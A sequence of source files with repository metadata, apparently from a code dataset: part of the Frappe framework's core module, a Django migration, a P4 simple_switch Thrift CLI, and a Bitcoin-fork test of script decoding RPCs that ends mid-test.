local.form_dict = _dict()
local.jenv = None
local.session.data = _dict()
local.user = User(username)
local.role_permissions = {}
def get_request_header(key, default=None):
"""Return HTTP request header.
:param key: HTTP header key.
:param default: Default value."""
return request.headers.get(key, default)
def sendmail(recipients=(), sender="", subject="No Subject", message="No Message",
as_markdown=False, bulk=False, ref_doctype=None, ref_docname=None,
add_unsubscribe_link=False, attachments=None, content=None, doctype=None, name=None, reply_to=None):
"""Send email using user's default **Email Account** or global default **Email Account**.
:param recipients: List of recipients.
:param sender: Email sender. Default is current user.
:param subject: Email Subject.
:param message: (or `content`) Email Content.
:param as_markdown: Convert content markdown to HTML.
:param bulk: Send via scheduled email sender **Bulk Email**. Don't send immediately.
:param ref_doctype: (or `doctype`) Append as communication to this DocType.
:param ref_docname: (or `name`) Append as communication to this document name.
:param add_unsubscribe_link: Allow user to unsubscribe from these emails.
:param attachments: List of attachments.
:param reply_to: Reply-To email id.
"""
if bulk:
import frappe.email.bulk
frappe.email.bulk.send(recipients=recipients, sender=sender,
subject=subject, message=content or message, ref_doctype = doctype or ref_doctype,
ref_docname = name or ref_docname, add_unsubscribe_link=add_unsubscribe_link, attachments=attachments,
reply_to=reply_to)
else:
import frappe.email
if as_markdown:
frappe.email.sendmail_md(recipients, sender=sender,
subject=subject, msg=content or message, attachments=attachments, reply_to=reply_to)
else:
frappe.email.sendmail(recipients, sender=sender,
subject=subject, msg=content or message, attachments=attachments, reply_to=reply_to)
logger = None
whitelisted = []
guest_methods = []
def whitelist(allow_guest=False):
"""
Decorator for whitelisting a function and making it accessible via HTTP.
Standard request will be `/api/method/[path.to.method]`
:param allow_guest: Allow non logged-in user to access this method.
Use as:
@frappe.whitelist()
def myfunc(param1, param2):
pass
"""
def innerfn(fn):
global whitelisted, guest_methods
whitelisted.append(fn)
if allow_guest:
guest_methods.append(fn)
return fn
return innerfn
def only_for(roles):
"""Raise `frappe.PermissionError` if the user does not have any of the given **Roles**.
:param roles: List of roles to check."""
if not isinstance(roles, (tuple, list)):
roles = (roles,)
roles = set(roles)
myroles = set(get_roles())
if not roles.intersection(myroles):
raise PermissionError
def clear_cache(user=None, doctype=None):
"""Clear **User**, **DocType** or global cache.
:param user: If user is given, only user cache is cleared.
:param doctype: If doctype is given, only DocType cache is cleared."""
import frappe.sessions
if doctype:
import frappe.model.meta
frappe.model.meta.clear_cache(doctype)
reset_metadata_version()
elif user:
frappe.sessions.clear_cache(user)
else: # everything
import translate
frappe.sessions.clear_cache()
translate.clear_cache()
reset_metadata_version()
frappe.local.cache = {}
for fn in frappe.get_hooks("clear_cache"):
get_attr(fn)()
frappe.local.role_permissions = {}
def get_roles(username=None):
"""Returns roles of current user."""
if not local.session:
return ["Guest"]
return get_user(username).get_roles()
def get_user(username):
"""Returns `frappe.utils.user.User` instance of given user."""
from frappe.utils.user import User
if not username or username == local.session.user:
return local.user
else:
return User(username)
def has_permission(doctype, ptype="read", doc=None, user=None):
"""Raises `frappe.PermissionError` if not permitted.
:param doctype: DocType for which permission is to be check.
:param ptype: Permission type (`read`, `write`, `create`, `submit`, `cancel`, `amend`). Default: `read`.
:param doc: [optional] Checks User permissions for given doc.
:param user: [optional] Check for given user. Default: current user."""
import frappe.permissions
return frappe.permissions.has_permission(doctype, ptype, doc, user=user)
def is_table(doctype):
"""Returns True if `istable` property (indicating child Table) is set for given DocType."""
tables = cache().get_value("is_table")
if tables==None:
tables = db.sql_list("select name from tabDocType where ifnull(istable,0)=1")
cache().set_value("is_table", tables)
return doctype in tables
def generate_hash(txt=None):
"""Generates random hash for given text + current timestamp + random string."""
import hashlib, time
from .utils import random_string
return hashlib.sha224((txt or "") + repr(time.time()) + repr(random_string(8))).hexdigest()
def reset_metadata_version():
"""Reset `metadata_version` (Client (Javascript) build ID) hash."""
v = generate_hash()
cache().set_value("metadata_version", v)
return v
def new_doc(doctype, parent_doc=None, parentfield=None):
"""Returns a new document of the given DocType with defaults set.
:param doctype: DocType of the new document.
:param parent_doc: [optional] add to parent document.
:param parentfield: [optional] add against this `parentfield`."""
from frappe.model.create_new import get_new_doc
return get_new_doc(doctype, parent_doc, parentfield)
def set_value(doctype, docname, fieldname, value):
"""Set document value. Calls `frappe.client.set_value`"""
import frappe.client
return frappe.client.set_value(doctype, docname, fieldname, value)
def get_doc(arg1, arg2=None):
"""Return a `frappe.model.document.Document` object of the given type and name.
:param arg1: DocType name as string **or** document JSON.
:param arg2: [optional] Document name as string.
Examples:
# insert a new document
todo = frappe.get_doc({"doctype":"ToDo", "description": "test"})
tood.insert()
# open an existing document
todo = frappe.get_doc("ToDo", "TD0001")
"""
import frappe.model.document
return frappe.model.document.get_doc(arg1, arg2)
def get_meta(doctype, cached=True):
"""Get `frappe.model.meta.Meta` instance of given doctype name."""
import frappe.model.meta
return frappe.model.meta.get_meta(doctype, cached=cached)
def delete_doc(doctype=None, name=None, force=0, ignore_doctypes=None, for_reload=False, ignore_permissions=False):
"""Delete a document. Calls `frappe.model.delete_doc.delete_doc`.
:param doctype: DocType of document to be delete.
:param name: Name of document to be delete.
:param force: Allow even if document is linked. Warning: This may lead to data integrity errors.
:param ignore_doctypes: Ignore if child table is one of these.
:param for_reload: Call `before_reload` trigger before deleting.
:param ignore_permissions: Ignore user permissions."""
import frappe.model.delete_doc
frappe.model.delete_doc.delete_doc(doctype, name, force, ignore_doctypes, for_reload, ignore_permissions)
def delete_doc_if_exists(doctype, name):
"""Delete document if exists."""
if db.exists(doctype, name):
delete_doc(doctype, name)
def reload_doc(module, dt=None, dn=None, force=False):
"""Reload Document from model (`[module]/[doctype]/[name]/[name].json`) files.
:param module: Module name.
:param dt: DocType name.
:param dn: Document name.
:param force: Reload even if `modified` timestamp matches.
"""
import frappe.modules
return frappe.modules.reload_doc(module, dt, dn, force=force)
def rename_doc(doctype, old, new, debug=0, force=False, merge=False, ignore_permissions=False):
"""Rename a document. Calls `frappe.model.rename_doc.rename_doc`"""
from frappe.model.rename_doc import rename_doc
return rename_doc(doctype, old, new, force=force, merge=merge, ignore_permissions=ignore_permissions)
def get_module(modulename):
"""Returns a module object for given Python module name using `importlib.import_module`."""
return importlib.import_module(modulename)
def scrub(txt):
"""Returns sluggified string. e.g. `Sales Order` becomes `sales_order`."""
return txt.replace(' ','_').replace('-', '_').lower()
def unscrub(txt):
"""Returns titlified string. e.g. `sales_order` becomes `Sales Order`."""
return txt.replace('_',' ').replace('-', ' ').title()
def get_module_path(module, *joins):
"""Get the path of the given module name.
:param module: Module name.
:param *joins: Join additional path elements using `os.path.join`."""
module = scrub(module)
return get_pymodule_path(local.module_app[module] + "." + module, *joins)
def get_app_path(app_name, *joins):
"""Return path of given app.
:param app: App name.
:param *joins: Join additional path elements using `os.path.join`."""
return get_pymodule_path(app_name, *joins)
def get_site_path(*joins):
"""Return path of current site.
:param *joins: Join additional path elements using `os.path.join`."""
return os.path.join(local.site_path, *joins)
def get_pymodule_path(modulename, *joins):
"""Return path of given Python module name.
:param modulename: Python module name.
:param *joins: Join additional path elements using `os.path.join`."""
joins = [scrub(part) for part in joins]
return os.path.join(os.path.dirname(get_module(scrub(modulename)).__file__), *joins)
def get_module_list(app_name):
"""Get list of modules for given all via `app/modules.txt`."""
return get_file_items(os.path.join(os.path.dirname(get_module(app_name).__file__), "modules.txt"))
def get_all_apps(with_frappe=False, with_internal_apps=True, sites_path=None):
"""Get list of all apps via `sites/apps.txt`."""
if not sites_path:
sites_path = local.sites_path
apps = get_file_items(os.path.join(sites_path, "apps.txt"), raise_not_found=True)
if with_internal_apps:
apps.extend(get_file_items(os.path.join(local.site_path, "apps.txt")))
if with_frappe:
apps.insert(0, 'frappe')
return apps
def get_installed_apps():
"""Get list of installed apps in current site."""
if getattr(flags, "in_install_db", True):
return []
installed = json.loads(db.get_global("installed_apps") or "[]")
return installed
@whitelist()
def get_versions():
"""Get versions of all installed apps.
Example:
{
"frappe": {
"title": "Frappe Framework",
"version": "5.0.0"
}
}"""
versions = {}
for app in get_installed_apps():
versions[app] = {
"title": get_hooks("app_title", app_name=app),
"description": get_hooks("app_description", app_name=app)
}
try:
versions[app]["version"] = get_attr(app + ".__version__")
except AttributeError:
versions[app]["version"] = '0.0.1'
return versions
def get_hooks(hook=None, default=None, app_name=None):
"""Get hooks via `app/hooks.py`
:param hook: Name of the hook. Will gather all hooks for this name and return as a list.
:param default: Default if no hook found.
:param app_name: Filter by app."""
def load_app_hooks(app_name=None):
hooks = {}
for app in [app_name] if app_name else get_installed_apps():
app = "frappe" if app=="webnotes" else app
try:
app_hooks = get_module(app + ".hooks")
except ImportError:
if local.flags.in_install_app:
# if app is not installed while restoring
# ignore it
pass
raise
for key in dir(app_hooks):
if not key.startswith("_"):
append_hook(hooks, key, getattr(app_hooks, key))
return hooks
def append_hook(target, key, value):
if isinstance(value, dict):
target.setdefault(key, {})
for inkey in value:
append_hook(target[key], inkey, value[inkey])
else:
append_to_list(target, key, value)
def append_to_list(target, key, value):
target.setdefault(key, [])
if not isinstance(value, list):
value = [value]
target[key].extend(value)
if app_name:
hooks = _dict(load_app_hooks(app_name))
else:
hooks = _dict(cache().get_value("app_hooks", load_app_hooks))
if hook:
return hooks.get(hook) or (default if default is not None else [])
else:
return hooks
def setup_module_map():
"""Rebuild map of all modules (internal)."""
_cache = cache()
if conf.db_name:
local.app_modules = _cache.get_value("app_modules")
local.module_app = _cache.get_value("module_app")
if not local.app_modules:
local.module_app, local.app_modules = {}, {}
for app in get_all_apps(True):
if app=="webnotes": app="frappe"
local.app_modules.setdefault(app, [])
for module in get_module_list(app):
module = scrub(module)
local.module_app[module] = app
local.app_modules[app].append(module)
if conf.db_name:
_cache.set_value("app_modules", local.app_modules)
_cache.set_value("module_app", local.module_app)
def get_file_items(path, raise_not_found=False, ignore_empty_lines=True):
"""Returns items from text file as a list. Ignores empty lines."""
content = read_file(path, raise_not_found=raise_not_found)
if content:
# \ufeff is no-width-break, \u200b is no-width-space
content = content.replace("\ufeff", "").replace("\u200b", "").strip()
return [p.strip() for p in content.splitlines() if (not ignore_empty_lines) or (p.strip() and not p.startswith("#"))]
else:
return []
def get_file_json(path):
"""Read a file and return parsed JSON object."""
with open(path, 'r') as f:
return json.load(f)
def read_file(path, raise_not_found=False):
"""Open a file and return its content as Unicode."""
from frappe.utils import cstr
if os.path.exists(path):
with open(path, "r") as f:
return cstr(f.read())
elif raise_not_found:
raise IOError("{} Not Found".format(path))
else:
return None
def get_attr(method_string):
"""Get python method object from its name."""
modulename = '.'.join(method_string.split('.')[:-1])
methodname = method_string.split('.')[-1]
return getattr(get_module(modulename), methodname)
def call(fn, *args, **kwargs):
"""Call a function and match arguments."""
if hasattr(fn, 'fnargs'):
fnargs = fn.fnargs
else:
fnargs, varargs, varkw, defaults = inspect.getargspec(fn)
newargs = {}
for a in fnargs:
if a in kwargs:
newargs[a] = kwargs.get(a)
return fn(*args, **newargs)
def make_property_setter(args, ignore_validate=False, validate_fields_for_doctype=True):
"""Create a new **Property Setter** (for overriding DocType and DocField properties)."""
args = _dict(args)
ps = get_doc({
'doctype': "Property Setter",
'doctype_or_field': args.doctype_or_field or "DocField",
'doc_type': args.doctype,
'field_name': args.fieldname,
'property': args.property,
'value': args.value,
'property_type': args.property_type or "Data",
'__islocal': 1
})
ps.ignore_validate = ignore_validate
ps.validate_fields_for_doctype = validate_fields_for_doctype
ps.insert()
def import_doc(path, ignore_links=False, ignore_insert=False, insert=False):
"""Import a file using Data Import Tool."""
from frappe.core.page.data_import_tool import data_import_tool
data_import_tool.import_doc(path, ignore_links=ignore_links, ignore_insert=ignore_insert, insert=insert)
def copy_doc(doc, ignore_no_copy=True):
""" No_copy fields also get copied."""
import copy
def remove_no_copy_fields(d):
for df in d.meta.get("fields", {"no_copy": 1}):
if hasattr(d, df.fieldname):
d.set(df.fieldname, None)
if not isinstance(doc, dict):
d = doc.as_dict()
else:
d = doc
newdoc = get_doc(copy.deepcopy(d))
newdoc.name = None
newdoc.set("__islocal", 1)
newdoc.owner = None
newdoc.creation = None
newdoc.amended_from = None
newdoc.amendment_date = None
if not ignore_no_copy:
remove_no_copy_fields(newdoc)
for d in newdoc.get_all_children():
d.name = None
d.parent = None
d.set("__islocal", 1)
d.owner = None
d.creation = None
if not ignore_no_copy:
remove_no_copy_fields(d)
return newdoc
def compare(val1, condition, val2):
"""Compare two values using `frappe.utils.compare`
`condition` could be:
- "^"
- "in"
- "not in"
- "="
- "!="
- ">"
- "<"
- ">="
- "<="
- "not None"
- "None"
"""
import frappe.utils
return frappe.utils.compare(val1, condition, val2)
def respond_as_web_page(title, html, success=None, http_status_code=None):
"""Send response as a web page with a message rather than JSON. Used to show permission errors etc.
:param title: Page title and heading.
:param message: Message to be shown.
:param success: Alert message.
:param http_status_code: HTTP status code."""
local.message_title = title
local.message = html
local.message_success = success
local.response['type'] = 'page'
local.response['page_name'] = 'message'
if http_status_code:
local.response['http_status_code'] = http_status_code
def build_match_conditions(doctype, as_condition=True):
"""Return match (User permissions) for given doctype as list or SQL."""
import frappe.desk.reportview
return frappe.desk.reportview.build_match_conditions(doctype, as_condition)
def get_list(doctype, *args, **kwargs):
"""List database query via `frappe.model.db_query`. Will also check for permissions.
:param doctype: DocType on which query is to be made.
:param fields: List of fields or `*`.
:param filters: List of filters (see example).
:param order_by: Order By e.g. `modified desc`.
:param limit_page_start: Start results at record #. Default 0.
:param limit_poge_length: No of records in the page. Default 20.
Example usage:
# simple dict filter
frappe.get_list("ToDo", fields=["name", "description"], filters = {"owner":"test@example.com"})
# filter as a list of lists
frappe.get_list("ToDo", fields="*", filters = [["modified", ">", "2014-01-01"]])
# filter as a list of dicts
frappe.get_list("ToDo", fields="*", filters = {"description": ("like", "test%")})
"""
import frappe.model.db_query
return frappe.model.db_query.DatabaseQuery(doctype).execute(None, *args, **kwargs)
def get_all(doctype, *args, **kwargs):
"""List database query via `frappe.model.db_query`. Will **not** check for conditions.
Parameters are same as `frappe.get_list`
:param doctype: DocType on which query is to be made.
:param fields: List of fields or `*`. Default is: `["name"]`.
:param filters: List of filters (see example).
:param order_by: Order By e.g. `modified desc`.
:param limit_page_start: Start results at record #. Default 0.
:param limit_poge_length: No of records in the page. Default 20.
Example usage:
# simple dict filter
frappe.get_all("ToDo", fields=["name", "description"], filters = {"owner":"test@example.com"})
# filter as a list of lists
frappe.get_all("ToDo", fields=["*"], filters = [["modified", ">", "2014-01-01"]])
# filter as a list of dicts
frappe.get_all("ToDo", fields=["*"], filters = {"description": ("like", "test%")})
"""
kwargs["ignore_permissions"] = True
return get_list(doctype, *args, **kwargs)
def add_version(doc):
"""Insert a new **Version** of the given document.
A **Version** is a JSON dump of the current document state."""
get_doc({
"doctype": "Version",
"ref_doctype": doc.doctype,
"docname": doc.name,
"doclist_json": json.dumps(doc.as_dict(), indent=1, sort_keys=True)
}).insert(ignore_permissions=True)
def get_test_records(doctype):
"""Returns list of objects from `test_records.json` in the given doctype's folder."""
from frappe.modules import get_doctype_module, get_module_path
path = os.path.join(get_module_path(get_doctype_module(doctype)), "doctype", scrub(doctype), "test_records.json")
if os.path.exists(path):
with open(path, "r") as f:
return json.loads(f.read())
else:
return []
def format_value(value, df, doc=None, currency=None):
"""Format value with given field properties.
:param value: Value to be formatted.
:param df: DocField object with properties `fieldtype`, `options` etc."""
import frappe.utils.formatters
return frappe.utils.formatters.format_value(value, df, doc, currency=currency)
def get_print_format(doctype, name, print_format=None, style=None, as_pdf=False):
"""Get Print Format for given document.
:param doctype: DocType of document.
:param name: Name of document.
:param print_format: Print Format name. Default 'Standard',
:param style: Print Format style.
:param as_pdf: Return as PDF. Default False."""
from frappe.website.render import build_page
from frappe.utils.pdf import get_pdf
local.form_dict.doctype = doctype
local.form_dict.name = name
local.form_dict.format = print_format
local.form_dict.style = style
html = build_page("print")
if as_pdf:
return get_pdf(html)
else:
return html
def attach_print(doctype, name, file_name):
from frappe.utils import scrub_urls
print_settings = db.get_singles_dict("Print Settings")
if int(print_settings.send_print_as_pdf or 0):
return {
"fname": file_name + ".pdf",
"fcontent": get_print_format(doctype, name, as_pdf=True)
}
else:
return {
"fname": file_name + ".html",
"fcontent": scrub_urls(get_print_format(doctype, name)).encode("utf-8")
}
logging_setup_complete = False
def get_logger(module=None):
from frappe.setup_logging import setup_logging
global logging_setup_complete
if not logging_setup_complete:
setup_logging()
logging_setup_complete = True
return logging.getLogger(module or "frappe")
| 31.181918
| 176
| 0.726292
|
4a0233a885c3b910e3ba1f8dc27a8042869ff1ec
| 297
|
py
|
Python
|
MFAEngine/apps/api/migrations/0015_delete_tokenconfig.py
|
justicevR/mfa_authentication_factor_v0.1
|
b7302904c3eaa00801ca4d78fb47797b16427ad4
|
[
"MIT"
] | null | null | null |
MFAEngine/apps/api/migrations/0015_delete_tokenconfig.py
|
justicevR/mfa_authentication_factor_v0.1
|
b7302904c3eaa00801ca4d78fb47797b16427ad4
|
[
"MIT"
] | null | null | null |
MFAEngine/apps/api/migrations/0015_delete_tokenconfig.py
|
justicevR/mfa_authentication_factor_v0.1
|
b7302904c3eaa00801ca4d78fb47797b16427ad4
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.2.6 on 2021-09-08 11:44
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('api', '0014_userenrolled_secret'),
]
operations = [
migrations.DeleteModel(
name='TokenConfig',
),
]
| 17.470588
| 47
| 0.606061
|
4a02349e8e027865efbbd9c70adac43480b8f78d
| 2,536
|
py
|
Python
|
controller/simple_switch_api.py
|
gustavo978/helpful
|
59e3fd062cff4451c9bf8268df78a24f93ff67b7
|
[
"Unlicense"
] | null | null | null |
controller/simple_switch_api.py
|
gustavo978/helpful
|
59e3fd062cff4451c9bf8268df78a24f93ff67b7
|
[
"Unlicense"
] | null | null | null |
controller/simple_switch_api.py
|
gustavo978/helpful
|
59e3fd062cff4451c9bf8268df78a24f93ff67b7
|
[
"Unlicense"
] | 2
|
2018-06-06T14:10:23.000Z
|
2020-04-07T17:20:55.000Z
|
import runtime_CLI
import argparse
import cmd
import os
import sys
import struct
import json
import bmpy_utils as utils
from sswitch_runtime import SimpleSwitch
from scapy.all import *
from functools import wraps
import bmpy_utils as utils
from bm_runtime.standard import Standard
from bm_runtime.standard.ttypes import *
try:
from bm_runtime.simple_pre import SimplePre
except:
pass
try:
from bm_runtime.simple_pre_lag import SimplePreLAG
except:
pass
class SimpleSwitchAPI(runtime_CLI.RuntimeAPI):
@staticmethod
def get_thrift_services():
return [("simple_switch", SimpleSwitch.Client)]
def __init__(self, pre_type, standard_client, mc_client, sswitch_client):
self.cli = runtime_CLI.RuntimeAPI.__init__(self, pre_type,
standard_client, mc_client)
self.sswitch_client = sswitch_client
def do_set_queue_depth(self, line):
"Set depth of one / all egress queue(s): set_queue_depth <nb_pkts> [<egress_port>]"
args = line.split()
depth = int(args[0])
if len(args) > 1:
port = int(args[1])
self.sswitch_client.set_egress_queue_depth(port, depth)
else:
self.sswitch_client.set_all_egress_queue_depths(depth)
def do_set_queue_rate(self, line):
"Set rate of one / all egress queue(s): set_queue_rate <rate_pps> [<egress_port>]"
args = line.split()
rate = int(args[0])
if len(args) > 1:
port = int(args[1])
self.sswitch_client.set_egress_queue_rate(port, rate)
else:
self.sswitch_client.set_all_egress_queue_rates(rate)
def do_mirroring_add(self, line):
"Add mirroring mapping: mirroring_add <mirror_id> <egress_port>"
args = line.split()
mirror_id, egress_port = int(args[0]), int(args[1])
self.sswitch_client.mirroring_mapping_add(mirror_id, egress_port)
def do_mirroring_delete(self, line):
"Delete mirroring mapping: mirroring_delete <mirror_id>"
mirror_id = int(line)
self.sswitch_client.mirroring_mapping_delete(mirror_id)
def do_get_time_elapsed(self, line):
"Get time elapsed (in microseconds) since the switch started: get_time_elapsed"
print self.sswitch_client.get_time_elapsed_us()
def do_get_time_since_epoch(self, line):
"Get time elapsed (in microseconds) since the switch clock's epoch: get_time_since_epoch"
print self.sswitch_client.get_time_since_epoch_us()
| 33.813333
| 97
| 0.693218
|
4a0234d78e4fb8791fe204b48e86336401c039cd
| 16,762
|
py
|
Python
|
test/functional/rpc_decodescript.py
|
bitcoin-rush/bitcoinrush
|
4329a6a7b9ce7a2188225f4abfc307e68de7dae0
|
[
"MIT"
] | null | null | null |
test/functional/rpc_decodescript.py
|
bitcoin-rush/bitcoinrush
|
4329a6a7b9ce7a2188225f4abfc307e68de7dae0
|
[
"MIT"
] | null | null | null |
test/functional/rpc_decodescript.py
|
bitcoin-rush/bitcoinrush
|
4329a6a7b9ce7a2188225f4abfc307e68de7dae0
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# Copyright (c) 2015-2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test decoding scripts via decodescript RPC command."""
from test_framework.messages import CTransaction, sha256
from test_framework.test_framework import BitcoinrushTestFramework
from test_framework.util import assert_equal, bytes_to_hex_str, hex_str_to_bytes
from io import BytesIO
class DecodeScriptTest(BitcoinrushTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 1
def decodescript_script_sig(self):
signature = '304502207fa7a6d1e0ee81132a269ad84e68d695483745cde8b541e3bf630749894e342a022100c1f7ab20e13e22fb95281a870f3dcf38d782e53023ee313d741ad0cfbc0c509001'
push_signature = '48' + signature
public_key = '03b0da749730dc9b4b1f4a14d6902877a92541f5368778853d9c4a0cb7802dcfb2'
push_public_key = '21' + public_key
# below are test cases for all of the standard transaction types
# 1) P2PK scriptSig
# the scriptSig of a public key scriptPubKey simply pushes a signature onto the stack
rpc_result = self.nodes[0].decodescript(push_signature)
assert_equal(signature, rpc_result['asm'])
# 2) P2PKH scriptSig
rpc_result = self.nodes[0].decodescript(push_signature + push_public_key)
assert_equal(signature + ' ' + public_key, rpc_result['asm'])
# 3) multisig scriptSig
# this also tests the leading portion of a P2SH multisig scriptSig
# OP_0 <A sig> <B sig>
rpc_result = self.nodes[0].decodescript('00' + push_signature + push_signature)
assert_equal('0 ' + signature + ' ' + signature, rpc_result['asm'])
# 4) P2SH scriptSig
# an empty P2SH redeemScript is valid and makes for a very simple test case.
# thus, such a spending scriptSig would just need to pass the outer redeemScript
# hash test and leave true on the top of the stack.
rpc_result = self.nodes[0].decodescript('5100')
assert_equal('1 0', rpc_result['asm'])
# 5) null data scriptSig - no such thing because null data scripts can not be spent.
# thus, no test case for that standard transaction type is here.
def decodescript_script_pub_key(self):
public_key = '03b0da749730dc9b4b1f4a14d6902877a92541f5368778853d9c4a0cb7802dcfb2'
push_public_key = '21' + public_key
public_key_hash = '5dd1d3a048119c27b28293056724d9522f26d945'
push_public_key_hash = '14' + public_key_hash
uncompressed_public_key = '04b0da749730dc9b4b1f4a14d6902877a92541f5368778853d9c4a0cb7802dcfb25e01fc8fde47c96c98a4f3a8123e33a38a50cf9025cc8c4494a518f991792bb7'
push_uncompressed_public_key = '41' + uncompressed_public_key
p2wsh_p2pk_script_hash = 'd8590cf8ea0674cf3d49fd7ca249b85ef7485dea62c138468bddeb20cd6519f7'
# below are test cases for all of the standard transaction types
# 1) P2PK scriptPubKey
# <pubkey> OP_CHECKSIG
rpc_result = self.nodes[0].decodescript(push_public_key + 'ac')
assert_equal(public_key + ' OP_CHECKSIG', rpc_result['asm'])
# P2PK is translated to P2WPKH
assert_equal('0 ' + public_key_hash, rpc_result['segwit']['asm'])
# 2) P2PKH scriptPubKey
# OP_DUP OP_HASH160 <PubKeyHash> OP_EQUALVERIFY OP_CHECKSIG
rpc_result = self.nodes[0].decodescript('76a9' + push_public_key_hash + '88ac')
assert_equal('OP_DUP OP_HASH160 ' + public_key_hash + ' OP_EQUALVERIFY OP_CHECKSIG', rpc_result['asm'])
# P2PKH is translated to P2WPKH
assert_equal('0 ' + public_key_hash, rpc_result['segwit']['asm'])
# 3) multisig scriptPubKey
# <m> <A pubkey> <B pubkey> <C pubkey> <n> OP_CHECKMULTISIG
# just imagine that the pub keys used below are different.
# for our purposes here it does not matter that they are the same even though it is unrealistic.
multisig_script = '52' + push_public_key + push_public_key + push_public_key + '53ae'
rpc_result = self.nodes[0].decodescript(multisig_script)
assert_equal('2 ' + public_key + ' ' + public_key + ' ' + public_key + ' 3 OP_CHECKMULTISIG', rpc_result['asm'])
# multisig in P2WSH
multisig_script_hash = bytes_to_hex_str(sha256(hex_str_to_bytes(multisig_script)))
assert_equal('0 ' + multisig_script_hash, rpc_result['segwit']['asm'])
# 4) P2SH scriptPubKey
# OP_HASH160 <Hash160(redeemScript)> OP_EQUAL.
# push_public_key_hash here should actually be the hash of a redeem script.
# but this works the same for purposes of this test.
rpc_result = self.nodes[0].decodescript('a9' + push_public_key_hash + '87')
assert_equal('OP_HASH160 ' + public_key_hash + ' OP_EQUAL', rpc_result['asm'])
# P2SH does not work in segwit secripts. decodescript should not return a result for it.
assert 'segwit' not in rpc_result
# 5) null data scriptPubKey
# use a signature look-alike here to make sure that we do not decode random data as a signature.
# this matters if/when signature sighash decoding comes along.
# would want to make sure that no such decoding takes place in this case.
signature_imposter = '48304502207fa7a6d1e0ee81132a269ad84e68d695483745cde8b541e3bf630749894e342a022100c1f7ab20e13e22fb95281a870f3dcf38d782e53023ee313d741ad0cfbc0c509001'
# OP_RETURN <data>
rpc_result = self.nodes[0].decodescript('6a' + signature_imposter)
assert_equal('OP_RETURN ' + signature_imposter[2:], rpc_result['asm'])
# 6) a CLTV redeem script. redeem scripts are in-effect scriptPubKey scripts, so adding a test here.
# OP_NOP2 is also known as OP_CHECKLOCKTIMEVERIFY.
# just imagine that the pub keys used below are different.
# for our purposes here it does not matter that they are the same even though it is unrealistic.
#
# OP_IF
# <receiver-pubkey> OP_CHECKSIGVERIFY
# OP_ELSE
# <lock-until> OP_CHECKLOCKTIMEVERIFY OP_DROP
# OP_ENDIF
# <sender-pubkey> OP_CHECKSIG
#
# lock until block 500,000
cltv_script = '63' + push_public_key + 'ad670320a107b17568' + push_public_key + 'ac'
rpc_result = self.nodes[0].decodescript(cltv_script)
assert_equal('OP_IF ' + public_key + ' OP_CHECKSIGVERIFY OP_ELSE 500000 OP_CHECKLOCKTIMEVERIFY OP_DROP OP_ENDIF ' + public_key + ' OP_CHECKSIG', rpc_result['asm'])
# CLTV script in P2WSH
cltv_script_hash = bytes_to_hex_str(sha256(hex_str_to_bytes(cltv_script)))
assert_equal('0 ' + cltv_script_hash, rpc_result['segwit']['asm'])
# 7) P2PK scriptPubKey
# <pubkey> OP_CHECKSIG
rpc_result = self.nodes[0].decodescript(push_uncompressed_public_key + 'ac')
assert_equal(uncompressed_public_key + ' OP_CHECKSIG', rpc_result['asm'])
# uncompressed pubkeys are invalid for checksigs in segwit scripts.
# decodescript should not return a P2WPKH equivalent.
assert 'segwit' not in rpc_result
# 8) multisig scriptPubKey with an uncompressed pubkey
# <m> <A pubkey> <B pubkey> <n> OP_CHECKMULTISIG
# just imagine that the pub keys used below are different.
# the purpose of this test is to check that a segwit script is not returned for bare multisig scripts
# with an uncompressed pubkey in them.
rpc_result = self.nodes[0].decodescript('52' + push_public_key + push_uncompressed_public_key +'52ae')
assert_equal('2 ' + public_key + ' ' + uncompressed_public_key + ' 2 OP_CHECKMULTISIG', rpc_result['asm'])
# uncompressed pubkeys are invalid for checksigs in segwit scripts.
# decodescript should not return a P2WPKH equivalent.
assert 'segwit' not in rpc_result
# 9) P2WPKH scriptpubkey
# 0 <PubKeyHash>
rpc_result = self.nodes[0].decodescript('00' + push_public_key_hash)
assert_equal('0 ' + public_key_hash, rpc_result['asm'])
# segwit scripts do not work nested into each other.
# a nested segwit script should not be returned in the results.
assert 'segwit' not in rpc_result
# 10) P2WSH scriptpubkey
# 0 <ScriptHash>
# even though this hash is of a P2PK script which is better used as bare P2WPKH, it should not matter
# for the purpose of this test.
rpc_result = self.nodes[0].decodescript('0020' + p2wsh_p2pk_script_hash)
assert_equal('0 ' + p2wsh_p2pk_script_hash, rpc_result['asm'])
# segwit scripts do not work nested into each other.
# a nested segwit script should not be returned in the results.
assert 'segwit' not in rpc_result
def decoderawtransaction_asm_sighashtype(self):
"""Test decoding scripts via RPC command "decoderawtransaction".
This test is in with the "decodescript" tests because they are testing the same "asm" script decodes.
"""
# this test case uses a random plain vanilla mainnet transaction with a single P2PKH input and output
tx = '0100000001696a20784a2c70143f634e95227dbdfdf0ecd51647052e70854512235f5986ca010000008a47304402207174775824bec6c2700023309a168231ec80b82c6069282f5133e6f11cbb04460220570edc55c7c5da2ca687ebd0372d3546ebc3f810516a002350cac72dfe192dfb014104d3f898e6487787910a690410b7a917ef198905c27fb9d3b0a42da12aceae0544fc7088d239d9a48f2828a15a09e84043001f27cc80d162cb95404e1210161536ffffffff0100e1f505000000001976a914eb6c6e0cdb2d256a32d97b8df1fc75d1920d9bca88ac00000000'
rpc_result = self.nodes[0].decoderawtransaction(tx)
assert_equal('304402207174775824bec6c2700023309a168231ec80b82c6069282f5133e6f11cbb04460220570edc55c7c5da2ca687ebd0372d3546ebc3f810516a002350cac72dfe192dfb[ALL] 04d3f898e6487787910a690410b7a917ef198905c27fb9d3b0a42da12aceae0544fc7088d239d9a48f2828a15a09e84043001f27cc80d162cb95404e1210161536', rpc_result['vin'][0]['scriptSig']['asm'])
# this test case uses a mainnet transaction that has a P2SH input and both P2PKH and P2SH outputs.
# it's from James D'Angelo's awesome introductory videos about multisig: https://www.youtube.com/watch?v=zIbUSaZBJgU and https://www.youtube.com/watch?v=OSA1pwlaypc
# verify that we have not altered scriptPubKey decoding.
